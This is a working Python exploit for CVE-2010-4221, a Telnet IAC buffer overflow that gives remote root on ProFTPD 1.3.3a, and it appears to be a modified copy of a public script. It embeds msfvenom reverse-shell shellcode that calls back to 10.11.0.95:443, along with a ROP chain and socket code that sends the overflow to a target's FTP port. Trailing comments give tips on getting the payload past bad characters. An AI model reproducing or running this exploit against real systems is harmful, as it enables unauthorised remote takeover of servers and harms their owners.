Modified version of CVE-2010-4221 python script found here: https://github.com/Muhammd/ProFTPD-1.3.3a/blob/master/ProFTPD_exploit.py

cve-2010-4221.py

#!/usr/bin/env python
#
###################################################################################################
#                                                  #                                              #
#  Vulnerability: ProFTPD IAC Remote Root Exploit  #  Telnet IAC Buffer Overflow (Linux)          #
#                                                  #  ProFTPD 1.3.2rc3                            #
#  Vulnerable Application: ProFTPD 1.3.3a          #  This is a part of the Metasploit Module,    #
#  Tested on Linux 2.6.32-5-686                    #  exploit/linux/ftp/proftp_telnet_iac         #
#                                                  #                                              #
#  Author: Muhammad Haidari                        #  Spawns a reverse shell to 10.11.0.95:443    #
#  Contact: ghmh@outlook.com                       #                                              #
#  Website: www.github.com/muhammd                 #                                              #
#                                                  #                                              #
###################################################################################################
#
#
# Usage: python ProFTPD_exploit.py <Remote IP Address>

import sys
import socket
import struct

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 EXITFUNC=thread \
#     PrependChrootBreak=true --smallest -f python -b '\x09\x0a\x0b\x0c\x0d\x20\xff'

payload = (
    '\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77\x29\x9a'
    '\x30\x83\xeb\xfc\xe2\xf4\x46\xe0\xab\xeb\x1d\x6f\xc2\xfd\xf7\x43'
    '\xa7\xb9\x94\x43\xbd\x68\xba\xa9\x13\xe9\x2f\xe4\x1a\x01\xb7\x79'
    '\xfc\x58\x59\x07\x13\xd3\x1d\x14\xc3\x80\x7b\xe4\x1a\xd2\x8d\x43'
    '\xa7\xb9\xae\x71\x57\xb0\x46\xf2\x6d\xd3\x24\x6a\xc9\x5a\x75\xa0'
    '\x7b\x80\x11\xe4\x1a\xa3\x2e\x99\xa5\xfd\xf7\x60\xe3\xc9\x1f\x23'
    '\x91\x30\x28\x41\x98\x30\x76\x92\x13\xd1\xc7\x4f\xca\x61\x24\x9a'
    '\x99\xb9\x96\xe4\x1a\x62\x1f\x47\xb5\x43\x1f\x41\xb5\x1f\x15\x40'
    '\x13\xd3\x25\x7a\x13\xd1\xc7\x22\x57\xb0'
)

# NOTE: All addresses are from the proftpd binary
IACCount = 4096 + 16
Offset = 0x102c - 4
Ret = '0x805a547'       # pop esi / pop ebp / ret
Writable = '0x80e81a0'  # .data

if len(sys.argv) < 2:
    print('\nUsage: %s <HOST>\n' % (sys.argv[0]))
    sys.exit()

rop = struct.pack('<L', 0xcccccccc)  # unused
# mov eax,esi / pop ebx / pop esi / pop ebp / ret
rop += struct.pack('<L', 0x805a544)
rop += struct.pack('<L', 0xcccccccc)  # becomes ebx
rop += struct.pack('<L', 0xcccccccc)  # becomes esi
rop += struct.pack('<L', 0xcccccccc)  # becomes ebp

# quadruple deref the res pointer :)
for _ in range(4):
    rop += struct.pack('<L', 0x8068886)  # mov eax,[eax] / ret

# skip the pool chunk header
for _ in range(16):
    rop += struct.pack('<L', 0x805bd8e)  # inc eax / adc cl, cl / ret

# execute the data :)
rop += struct.pack('<L', 0x0805c26c)  # jmp eax

buf = 'SITE '
buf += payload

if len(buf) % 2 == 0:
    buf += 'B'
    print('Buffer was aligned')

buf += '\xff' * (IACCount - len(payload))
buf += '\x90' * (Offset - len(buf))
addrs = struct.pack('<L', 0x805a547)  # Ret
addrs += struct.pack('<L', 0x80e81a0)  # Writable
addrs += rop
buf += addrs
buf += '\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 21))
s.recv(1024)
s.send(buf)
print('Payload Successfully Send...Check your Multi/Handler')
print('....Reverse shell is comming to you...')

print(s.recv(1024))
s.close()

bad characters xff and x0d kept breaking my creation.
Either i got lucky when i removed them (they aren't in metasploit code) OR they don't matter.
Try removing them, or remaking the payload until it succeeds.

Hmm, IIRC, I didn't have any issues with the current badchars, but it was a while ago. YMMV, I guess.